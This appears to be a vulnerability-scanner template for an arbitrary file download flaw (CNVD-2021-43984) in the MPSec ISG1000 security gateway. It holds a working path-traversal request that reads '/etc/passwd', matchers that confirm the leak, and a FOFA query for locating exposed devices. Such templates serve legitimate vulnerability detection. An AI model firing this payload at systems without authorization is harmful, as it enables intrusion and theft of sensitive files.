id: CNVD-2021-43984

info:
  name: MPSec ISG1000 Security Gateway - Arbitrary File Download
  author: DhiyaneshDk
  severity: high
  description: |
    The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984
    - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml
  metadata:
    verified: true
    max-request: 1
    fofa-query: "迈普通信技术股份有限公司"
  tags: MAIPU-ISG1000 security gateway

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "text/plain"
          - "USGSESSID="
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022061598004928357fcf001b2b6d6b923410f88220ddc33e1d397637ac2f854d5fb022100d28b7934c715f0e8bc357071dfad8b755a936e9771c6d808d7fef19d6e47cdcd:922c64590222798bb761d5b6d8e72950
